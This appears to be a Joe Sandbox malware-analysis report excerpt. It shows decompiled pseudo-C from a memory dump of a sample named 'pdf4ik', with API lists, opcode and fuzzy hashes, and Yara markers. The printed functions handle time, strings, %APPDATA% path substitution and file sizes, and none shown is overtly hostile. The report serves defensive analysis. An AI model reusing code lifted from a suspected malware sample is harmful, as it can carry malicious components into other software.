                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC987,?,?,?), ref: 29DAC3DD
                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC987,?,?,?), ref: 29DAC3F7
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29DAC417
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 568878067-0
                                        • Opcode ID: 3310326056420f0e567c9f6508ce34e1262f882a976d61910b234ec3af33d7af
                                        • Instruction ID: a9e8dd942da5048f27f686c98123ae3619b1d897d8852e6010f994b80451603c
                                        • Opcode Fuzzy Hash: 3310326056420f0e567c9f6508ce34e1262f882a976d61910b234ec3af33d7af
                                        • Instruction Fuzzy Hash: A4411BB29007489FDB18CFA9D890AAEBBF5FF58310F40892EE59AD7740DB70A444DB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DAC4A0 Relevance: 6.1, APIs: 4, Instructions: 83timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 87%
                                        			E29DAC4A0(intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				struct _FILETIME _v48;
				struct _FILETIME _v56;
				void* __ebx;
				signed int _t37;
				intOrPtr _t44;
				intOrPtr _t62;
				intOrPtr _t76;
				signed int _t84;

				_t37 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t37 ^ _t84;
				 *((intOrPtr*)(__esi + 0x7c)) = 0;
				 *((intOrPtr*)(__esi + 0x84)) = 0;
				 *((char*)(__esi + 0x80)) = 0;
				 *((intOrPtr*)(__esi + 0x78)) = 0;
				 *((intOrPtr*)(__esi + 0x90)) = 0;
				 *((intOrPtr*)(__esi + 0x74)) = 0;
				 *((intOrPtr*)(__esi + 0x4c)) = 0x41c00010;
				 *((intOrPtr*)(__esi + 0x70)) = 0;
				 *((char*)(__esi + 0x6c)) = 0;
				GetLocalTime( &_v40);
				SystemTimeToFileTime( &_v40,  &_v48);
				_v56.dwLowDateTime = _v48.dwLowDateTime;
				_v56.dwHighDateTime = _v48.dwHighDateTime;
				FileTimeToSystemTime( &_v56,  &_v24);
				_t76 = _v48.dwHighDateTime;
				asm("sbb edx, 0x19db1de");
				_t44 = E29DB75A0(_v48.dwLowDateTime - 0xd53e8000, _t76, 0x989680, 0);
				 *((intOrPtr*)(__esi + 0x50)) = _t44;
				 *((intOrPtr*)(__esi + 0x58)) = _t44;
				 *((intOrPtr*)(__esi + 0x60)) = _t44;
				_t62 = _t76;
				 *((intOrPtr*)(__esi + 0x5c)) = _t62;
				 *((intOrPtr*)(__esi + 0x64)) = _t62;
				 *((intOrPtr*)(__esi + 0x54)) = _t76;
				 *(__esi + 0x68) = ((_v24.wYear + 0xffffffc4 << 0x00000004 | _v24.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v24.wDay & 0x0000001f) << 0x00000010 | (_v24.wMinute & 0x0000003f | _v24.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v24.wSecond + _v24.wSecond & 0x0000001f;
				return E29DADF46(0, 0, _v8 ^ _t84, ((_v24.wYear + 0xffffffc4 << 0x00000004 | _v24.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v24.wDay & 0x0000001f) << 0x00000010 | (_v24.wMinute & 0x0000003f | _v24.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v24.wSecond + _v24.wSecond & 0x0000001f, __edi, __esi);
			}














                                        0x29dac4a6
                                        0x29dac4ad
                                        0x29dac4b7
                                        0x29dac4ba
                                        0x29dac4c0
                                        0x29dac4c6
                                        0x29dac4c9
                                        0x29dac4cf
                                        0x29dac4d2
                                        0x29dac4d9
                                        0x29dac4dc
                                        0x29dac4df
                                        0x29dac4ed
                                        0x29dac4fc
                                        0x29dac504
                                        0x29dac507
                                        0x29dac510
                                        0x29dac51f
                                        0x29dac527
                                        0x29dac52c
                                        0x29dac52f
                                        0x29dac532
                                        0x29dac538
                                        0x29dac53a
                                        0x29dac53d
                                        0x29dac554
                                        0x29dac588
                                        0x29dac596

                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC999,?,?), ref: 29DAC4DF
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC999,?,?), ref: 29DAC4ED
                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC999,?,?), ref: 29DAC507
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29DAC527
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 568878067-0
                                        • Opcode ID: 194cfa0c8d21d3178253f97d4bffd4cb5ef9b91557098c59c99b83fab75aa215
                                        • Instruction ID: a65ee49fd7584e5dc1a4aa0faf0d408b7c197f5c4797191f61382b38d7c1c9be
                                        • Opcode Fuzzy Hash: 194cfa0c8d21d3178253f97d4bffd4cb5ef9b91557098c59c99b83fab75aa215
                                        • Instruction Fuzzy Hash: 8F311AB1D007089FD719CFA9C990AAAFBF5FB48200B40892EE59AE7750D774A904DB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DBF3D1 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DBF3D1(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E29DBECC3(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E29DBEDAA(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E29DBF2E4(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E29DBF223(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                        0x29dbf3d6
                                        0x29dbf3dc
                                        0x29dbf44f
                                        0x00000000
                                        0x29dbf3e3
                                        0x29dbf3e3
                                        0x29dbf3e6
                                        0x29dbf401
                                        0x29dbf404
                                        0x29dbf424
                                        0x29dbf436
                                        0x29dbf406
                                        0x29dbf406
                                        0x29dbf409
                                        0x00000000
                                        0x29dbf40b
                                        0x29dbf41d
                                        0x29dbf41d
                                        0x29dbf409
                                        0x29dbf454
                                        0x29dbf458
                                        0x29dbf3e8
                                        0x29dbf400
                                        0x29dbf400
                                        0x29dbf3e6

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                        • Instruction ID: 1e35597aaaa4b70d3cdf48fd136220bc61f40801dc8172895dac987b3390bfb1
                                        • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                        • Instruction Fuzzy Hash: BD11803200004EBBCF066F89DC21CDE3F66BF58294B448429FA595A931C332C5B2BB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA4650 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E29DA4650(char* __eax, char* _a4, intOrPtr _a8) {
				char* _t10;
				char* _t16;
				char _t17;
				char* _t19;
				char* _t20;
				void* _t21;
				void* _t23;
				CHAR* _t24;

				_t19 = __eax;
				_t16 = StrStrA(__eax, _a4);
				if(_t16 != 0) {
					_t23 = _t16 - _t19;
					 *0x29dd8498(0x29dd8830, _t19, _t23, _t21);
					_t10 = _a4;
					_t3 = _t23 + 0x29dd8830; // 0x0
					_t24 = _t3;
					 *_t24 = 0;
					_t20 =  &(_t10[1]);
					do {
						_t17 =  *_t10;
						_t10 =  &(_t10[1]);
					} while (_t17 != 0);
					wsprintfA(_t24, "%s%s", _a8, _t10 - _t20 + _t16);
					return 0x29dd8830;
				} else {
					return _t19;
				}
			}











                                        0x29da4655
                                        0x29da4662
                                        0x29da4666
                                        0x29da4671
                                        0x29da467a
                                        0x29da4680
                                        0x29da4683
                                        0x29da4683
                                        0x29da4689
                                        0x29da468c
                                        0x29da4690
                                        0x29da4690
                                        0x29da4692
                                        0x29da4693
                                        0x29da46a6
                                        0x29da46b8
                                        0x29da4668
                                        0x29da466d
                                        0x29da466d

                                        APIs
                                        • StrStrA.SHLWAPI(?,?,000F4240,?,?,29D909A9,%APPDATA%,?), ref: 29DA465C
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000,00000000,?,29D909A9,%APPDATA%,?), ref: 29DA467A
                                        • wsprintfA.USER32 ref: 29DA46A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1799455324-3252725368
                                        • Opcode ID: f6041a07c936746d6609cae34556e469b4aef735f5341e7a049e350d9343300f
                                        • Instruction ID: 55d6ea70373c71c403c2a2cb993a0310c262444c2bdb2adbb7071e45ac708371
                                        • Opcode Fuzzy Hash: f6041a07c936746d6609cae34556e469b4aef735f5341e7a049e350d9343300f
                                        • Instruction Fuzzy Hash: E4F0C8332001556FD7115E5DEC98DEB7B9CDF866A97044129F94CC7701CA61ED06D3B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA4E00 Relevance: 6.0, APIs: 4, Instructions: 36fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 29%
                                        			E29DA4E00(CHAR* __eax) {
				void* _v8;
				char _v12;
				void* _t7;
				void* _t14;

				_t14 = CreateFileA(__eax, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t14 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_t7 =  *0x29dd836c(_t14,  &_v12);
					_push(_t14);
					if(_t7 != 0) {
						CloseHandle();
						return _v12;
					} else {
						CloseHandle();
						goto L3;
					}
				}
			}







                                        0x29da4e20
                                        0x29da4e25
                                        0x29da4e3d
                                        0x29da4e45
                                        0x29da4e27
                                        0x29da4e2c
                                        0x29da4e32
                                        0x29da4e35
                                        0x29da4e46
                                        0x29da4e56
                                        0x29da4e37
                                        0x29da4e37
                                        0x00000000
                                        0x29da4e37
                                        0x29da4e35

                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,29D90797), ref: 29DA4E1A
                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,29D90797), ref: 29DA4E2C
                                        • CloseHandle.KERNEL32(00000000,?,?,29D90797), ref: 29DA4E37
                                        • CloseHandle.KERNEL32(00000000,?,?,29D90797), ref: 29DA4E46
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandle$CreateSize
                                        • String ID:
                                        • API String ID: 4148174661-0
                                        • Opcode ID: 356853270da570aa574ba2e6423c30f6fb6a1143a518a43d22efae0c58fc0007
                                        • Instruction ID: a597651ef9ae59ecb28d94dc6e2b3b3563424daa6bb625b272fa180ebc3f5a5d
                                        • Opcode Fuzzy Hash: 356853270da570aa574ba2e6423c30f6fb6a1143a518a43d22efae0c58fc0007
                                        • Instruction Fuzzy Hash: 61F0A736681214BBD211F7B9EC0AF9A7BACDF08A60F104255FD09E31C4E674761196E4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA10B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 81%
                                        			E29DA10B0(void* __ecx, signed int* __edx, signed int _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v48;
				signed int _v49;
				char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t57;
				signed int _t59;
				signed int _t63;
				signed int _t67;
				void* _t69;
				void* _t74;
				signed int* _t78;
				signed int _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t86;
				intOrPtr* _t91;
				signed int _t101;
				void* _t107;
				intOrPtr _t108;
				signed int _t111;
				void* _t112;
				intOrPtr _t113;
				signed int _t115;
				signed int _t119;
				signed int _t121;
				void* _t122;
				void* _t123;

				_t100 = __edx;
				_push(0xffffffff);
				_push(E29DC2158);
				_push( *[fs:0x0]);
				_t123 = _t122 - 0x2c;
				_t56 =  *0x29dd5664; // 0xd9555f04
				_t57 = _t56 ^ _t121;
				_v20 = _t57;
				_push(_t112);
				_push(_t57);
				 *[fs:0x0] =  &_v16;
				_t80 = _a4;
				_t107 = __ecx;
				if(_t80 != 0xffffffff) {
					_t59 =  *(__ecx + 0x24);
					_t86 =  *_t59;
					__eflags = _t86;
					if(_t86 == 0) {
						L5:
						__eflags =  *(_t107 + 0x54);
						if( *(_t107 + 0x54) == 0) {
							L34:
							_t60 = _t59 | 0xffffffff;
							__eflags = _t59 | 0xffffffff;
							L35:
							 *[fs:0x0] = _v16;
							_pop(_t108);
							_pop(_t113);
							_pop(_t81);
							return E29DADF46(_t60, _t81, _v20 ^ _t121, _t100, _t108, _t113);
						}
						_t91 =  *((intOrPtr*)(_t107 + 0x10));
						_t100 = _t107 + 0x48;
						__eflags =  *_t91 - _t107 + 0x48;
						if( *_t91 == _t107 + 0x48) {
							 *_t91 =  *((intOrPtr*)(_t107 + 0x3c));
							 *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x20)))) =  *((intOrPtr*)(_t107 + 0x40));
							_t100 =  *((intOrPtr*)(_t107 + 0x30));
							__eflags = 0;
							 *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x30)))) = 0;
						}
						__eflags =  *(_t107 + 0x44);
						if(__eflags != 0) {
							_v49 = _t80;
							E29DA19F0( &_v48);
							_v8 = 0;
							while(1) {
								L12:
								_t63 = _v48;
								_t82 = _v28;
								while(1) {
									_t101 = _t63;
									__eflags = _t82 - 0x10;
									if(_t82 < 0x10) {
										_t101 =  &_v48;
										_t63 = _t101;
									}
									_t115 =  *( *(_t107 + 0x44));
									_t100 =  &_v49;
									_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x14))))(_t107 + 0x4c,  &_v49,  &_v48,  &_v60, _t63, _t101 + _v32,  &_v56);
									__eflags = _t67;
									if(_t67 < 0) {
										break;
									}
									__eflags = _t67 - 1;
									if(_t67 > 1) {
										__eflags = _t67 - 3;
										if(__eflags != 0) {
											break;
										}
										_push( *(_t107 + 0x54));
										_push(_v49);
										_t69 = E29DAED78( &_v56,  *(_t107 + 0x54), _t115, __eflags);
										__eflags = _t69 - 0xffffffff;
										if(_t69 == 0xffffffff) {
											E29D89160( &_v48);
											_t60 = _t115 | 0xffffffff;
										} else {
											E29D89160( &_v48);
											_t60 = _a4;
										}
										goto L35;
									}
									_t82 = _v28;
									_t63 = _v48;
									_t96 = _t63;
									__eflags = _t82 - 0x10;
									if(_t82 < 0x10) {
										_t96 =  &_v48;
									}
									_t119 = _v56 - _t96;
									__eflags = _t119;
									if(_t119 == 0) {
										L24:
										_t100 =  &_v49;
										 *((char*)(_t107 + 0x49)) = 1;
										__eflags = _v60 -  &_v49;
										if(_v60 !=  &_v49) {
											E29D89160( &_v48);
											_t60 = _a4;
											goto L35;
										}
										__eflags = _t119;
										if(_t119 != 0) {
											continue;
										}
										__eflags = _v32 - 0x20;
										if(_v32 >= 0x20) {
											break;
										}
										E29D957D0(_t119 + 8, _t96,  &_v48, _t119);
										goto L12;
									} else {
										__eflags = _t82 - 0x10;
										if(__eflags < 0) {
											_t63 =  &_v48;
										}
										_t96 =  *(_t107 + 0x54);
										_push( *(_t107 + 0x54));
										_push(_t119);
										_push(1);
										_push(_t63);
										_t74 = E29DAF99B(_t82, _t100, _t107, _t119, __eflags);
										_t123 = _t123 + 0x10;
										__eflags = _t119 - _t74;
										if(_t119 != _t74) {
											break;
										} else {
											_t82 = _v28;
											_t63 = _v48;
											goto L24;
										}
									}
								}
								_t59 = E29D89160( &_v48);
								goto L34;
							}
						} else {
							_push( *(_t107 + 0x54));
							_push(_t80);
							_t59 = E29DAED78(_t80,  *(_t107 + 0x54), _t112, __eflags);
							__eflags = _t59 - 0xffffffff;
							if(_t59 == 0xffffffff) {
								goto L34;
							}
							_t60 = _t80;
							goto L35;
						}
					}
					_t59 =  *(__ecx + 0x34);
					_t100 =  *_t59 + _t86;
					__eflags = _t86 -  *_t59 + _t86;
					if(_t86 >=  *_t59 + _t86) {
						goto L5;
					}
					 *_t59 =  *_t59 - 1;
					_t111 =  *(__ecx + 0x24);
					_t78 =  *_t111;
					 *_t111 =  &(_t78[0]);
					 *_t78 = _t80;
					_t60 = _t80;
					goto L35;
				}
				_t60 = 0;
				goto L35;
			}








































                                        0x29da10b0
                                        0x29da10b3
                                        0x29da10b5
                                        0x29da10c0
                                        0x29da10c1
                                        0x29da10c4
                                        0x29da10c9
                                        0x29da10cb
                                        0x29da10cf
                                        0x29da10d1
                                        0x29da10d5
                                        0x29da10db
                                        0x29da10de
                                        0x29da10e3
                                        0x29da10ec
                                        0x29da10ef
                                        0x29da10f1
                                        0x29da10f3
                                        0x29da1115
                                        0x29da1115
                                        0x29da1119
                                        0x29da126e
                                        0x29da126e
                                        0x29da126e
                                        0x29da1271
                                        0x29da1274
                                        0x29da127c
                                        0x29da127d
                                        0x29da127e
                                        0x29da128c
                                        0x29da128c
                                        0x29da111f
                                        0x29da1122
                                        0x29da1125
                                        0x29da1127
                                        0x29da112f
                                        0x29da1134
                                        0x29da1136
                                        0x29da1139
                                        0x29da113b
                                        0x29da113b
                                        0x29da113d
                                        0x29da1141
                                        0x29da1166
                                        0x29da1169
                                        0x29da116e
                                        0x29da1175
                                        0x29da1175
                                        0x29da1175
                                        0x29da1178
                                        0x29da1180
                                        0x29da1180
                                        0x29da1182
                                        0x29da1185
                                        0x29da1187
                                        0x29da118a
                                        0x29da118a
                                        0x29da1192
                                        0x29da11a2
                                        0x29da11ad
                                        0x29da11af
                                        0x29da11b1
                                        0x00000000
                                        0x00000000
                                        0x29da11b7
                                        0x29da11ba
                                        0x29da1220
                                        0x29da1223
                                        0x00000000
                                        0x00000000
                                        0x29da122c
                                        0x29da122d
                                        0x29da122e
                                        0x29da1236
                                        0x29da1239
                                        0x29da1250
                                        0x29da1255
                                        0x29da123b
                                        0x29da1241
                                        0x29da1246
                                        0x29da1246
                                        0x00000000
                                        0x29da1239
                                        0x29da11bc
                                        0x29da11bf
                                        0x29da11c2
                                        0x29da11c4
                                        0x29da11c7
                                        0x29da11c9
                                        0x29da11c9
                                        0x29da11cf
                                        0x29da11cf
                                        0x29da11d1
                                        0x29da11f5
                                        0x29da11f5
                                        0x29da11f8
                                        0x29da11fc
                                        0x29da11ff
                                        0x29da125c
                                        0x29da1261
                                        0x00000000
                                        0x29da1261
                                        0x29da1201
                                        0x29da1203
                                        0x00000000
                                        0x00000000
                                        0x29da1209
                                        0x29da120d
                                        0x00000000
                                        0x00000000
                                        0x29da1216
                                        0x00000000
                                        0x29da11d3
                                        0x29da11d3
                                        0x29da11d6
                                        0x29da11d8
                                        0x29da11d8
                                        0x29da11db
                                        0x29da11de
                                        0x29da11df
                                        0x29da11e0
                                        0x29da11e2
                                        0x29da11e3
                                        0x29da11e8
                                        0x29da11eb
                                        0x29da11ed
                                        0x00000000
                                        0x29da11ef
                                        0x29da11ef
                                        0x29da11f2
                                        0x00000000
                                        0x29da11f2
                                        0x29da11ed
                                        0x29da11d1
                                        0x29da1269
                                        0x00000000
                                        0x29da1269
                                        0x29da1143
                                        0x29da1149
                                        0x29da114a
                                        0x29da114b
                                        0x29da1153
                                        0x29da1156
                                        0x00000000
                                        0x00000000
                                        0x29da115c
                                        0x00000000
                                        0x29da115c
                                        0x29da1141
                                        0x29da10f5
                                        0x29da10fa
                                        0x29da10fc
                                        0x29da10fe
                                        0x00000000
                                        0x00000000
                                        0x29da1100
                                        0x29da1102
                                        0x29da1105
                                        0x29da110a
                                        0x29da110c
                                        0x29da110e
                                        0x00000000
                                        0x29da110e
                                        0x29da10e5
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 33a0e5a042ae45061e4074352c0ecd56507409f23c8a4d634630bc0225cdf780
                                        • Instruction ID: 294f6f06d5bde4d395f922c110204d8002a85b2d77c24365ef9ad8da757e9a40
                                        • Opcode Fuzzy Hash: 33a0e5a042ae45061e4074352c0ecd56507409f23c8a4d634630bc0225cdf780
                                        • Instruction Fuzzy Hash: B051A475A00509AFCB04CF68C8819DEB3B5FF59754F10862ED921A7A80E730F926DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA41B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DA41B0(void* __eax, intOrPtr* __ecx, signed int _a4) {
				void* __edi;
				intOrPtr _t18;
				intOrPtr* _t19;
				short* _t26;
				intOrPtr* _t31;
				intOrPtr* _t32;
				signed int _t41;
				void* _t42;
				intOrPtr _t51;
				intOrPtr* _t55;
				void* _t56;

				_t56 = __eax;
				_t55 = __ecx;
				if(__eax == 0) {
					L12:
					_t41 = _a4;
					if(_t41 > 0x7ffffffe) {
						E29DAD440("string too long");
					}
					_t18 =  *((intOrPtr*)(_t55 + 0x14));
					if(_t18 >= _t41) {
						if(_t41 != 0) {
							goto L16;
						} else {
							 *(_t55 + 0x10) = _t41;
							if(_t18 < 8) {
								_t26 = _t55;
								 *_t26 = 0;
								return _t26;
							} else {
								 *((short*)( *_t55)) = 0;
								return _t55;
							}
						}
					} else {
						E29D97B00(_t55, _t41,  *(_t55 + 0x10));
						if(_t41 == 0) {
							L26:
							return _t55;
						} else {
							L16:
							if( *((intOrPtr*)(_t55 + 0x14)) < 8) {
								_t19 = _t55;
							} else {
								_t19 =  *_t55;
							}
							_t42 = _t41 + _t41;
							E29DB0010(_t19, _t56, _t42);
							 *(_t55 + 0x10) = _a4;
							if( *((intOrPtr*)(_t55 + 0x14)) < 8) {
								 *((short*)(_t42 + _t55)) = 0;
								goto L26;
							} else {
								 *((short*)(_t42 +  *_t55)) = 0;
								return _t55;
							}
						}
					}
				} else {
					_t51 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t51 < 8) {
						_t31 = __ecx;
					} else {
						_t31 =  *__ecx;
					}
					if(_t56 < _t31) {
						goto L12;
					} else {
						if(_t51 < 8) {
							_t32 = _t55;
						} else {
							_t32 =  *_t55;
						}
						if(_t32 +  *(_t55 + 0x10) * 2 <= _t56) {
							goto L12;
						} else {
							if(_t51 < 8) {
								return E29D97940(_t55, _t55, _t56 - _t55 >> 1);
							} else {
								return E29D97940(_t55, _t55, _t56 -  *_t55 >> 1);
							}
						}
					}
				}
			}














                                        0x29da41b4
                                        0x29da41b7
                                        0x29da41bb
                                        0x29da4215
                                        0x29da4216
                                        0x29da421f
                                        0x29da4226
                                        0x29da4226
                                        0x29da422b
                                        0x29da4230
                                        0x29da424d
                                        0x00000000
                                        0x29da424f
                                        0x29da424f
                                        0x29da4255
                                        0x29da4268
                                        0x29da426d
                                        0x29da4272
                                        0x29da4257
                                        0x29da425c
                                        0x29da4264
                                        0x29da4264
                                        0x29da4255
                                        0x29da4232
                                        0x29da4238
                                        0x29da423f
                                        0x29da42a9
                                        0x29da42af
                                        0x29da4241
                                        0x29da4241
                                        0x29da4245
                                        0x29da4275
                                        0x29da4247
                                        0x29da4247
                                        0x29da4247
                                        0x29da4277
                                        0x29da427c
                                        0x29da428b
                                        0x29da428e
                                        0x29da42a5
                                        0x00000000
                                        0x29da4290
                                        0x29da4294
                                        0x29da429e
                                        0x29da429e
                                        0x29da428e
                                        0x29da423f
                                        0x29da41bd
                                        0x29da41bd
                                        0x29da41c3
                                        0x29da41c9
                                        0x29da41c5
                                        0x29da41c5
                                        0x29da41c5
                                        0x29da41cd
                                        0x00000000
                                        0x29da41cf
                                        0x29da41d2
                                        0x29da41d8
                                        0x29da41d4
                                        0x29da41d4
                                        0x29da41d4
                                        0x29da41e2
                                        0x00000000
                                        0x29da41e4
                                        0x29da41e7
                                        0x29da4212
                                        0x29da41e9
                                        0x29da41fc
                                        0x29da41fc
                                        0x29da41e7
                                        0x29da41e2
                                        0x29da41cd

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA4226
                                        • _memmove.LIBCMT ref: 29DA427C
                                          • Part of subcall function 29D97940: std::_Xinvalid_argument.LIBCPMT ref: 29D97957
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                        • String ID: string too long
                                        • API String ID: 2168136238-2556327735
                                        • Opcode ID: f80515d17c578335d4df051c2ee93d0c4130a532a0470cc872f6cf4219303329
                                        • Instruction ID: 4537543fa4851366f2f81c81549bf1db2632ceb45e340809c8110e5351548d6a
                                        • Opcode Fuzzy Hash: f80515d17c578335d4df051c2ee93d0c4130a532a0470cc872f6cf4219303329
                                        • Instruction Fuzzy Hash: EC316372314115AB4704DF5EE8C0869B3AAFFE5262314563EEA08C7A00D721BC76D7B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 45%
                                        			E29DA3730(intOrPtr* __ecx) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v190;
				char _v192;
				intOrPtr _v200;
				char _v204;
				char _v220;
				signed int _v228;
				char _v232;
				char _v248;
				intOrPtr _v256;
				char _v260;
				char _v276;
				intOrPtr* _v280;
				char _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				signed int _t46;
				intOrPtr* _t51;
				void* _t57;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				signed int _t95;
				void* _t96;
				void* _t98;

				_push(0xffffffff);
				_push(E29DC2091);
				_push( *[fs:0x0]);
				_t45 =  *0x29dd5664; // 0xd9555f04
				_t46 = _t45 ^ _t95;
				_v20 = _t46;
				_push(_t46);
				 *[fs:0x0] =  &_v16;
				_t92 = __ecx;
				_v280 = __ecx;
				_v284 = 0;
				_v200 = 0xf;
				_v204 = 0;
				_v220 = 0;
				_v8 = 0;
				_v192 = 0;
				E29DB5640( &_v190, 0, 0xa8);
				_t98 = _t96 - 0x10c + 0xc;
				_push(0x55);
				_t84 =  &_v192;
				_push( &_v192);
				if( *0x29dd8414() != 0) {
					_t51 =  &_v192;
					_v228 = 7;
					_v232 = 0;
					_v248 = 0;
					_t84 = _t51 + 2;
					do {
						_t76 =  *_t51;
						_t51 = _t51 + 2;
					} while (_t76 != 0);
					E29DA41B0( &_v192,  &_v248, _t51 - _t84 >> 1);
					_v8 = 1;
					_t57 = E29DA48F0( &_v248,  &_v276, _t84);
					_v8 = 2;
					E29D891D0(_t57,  &_v220);
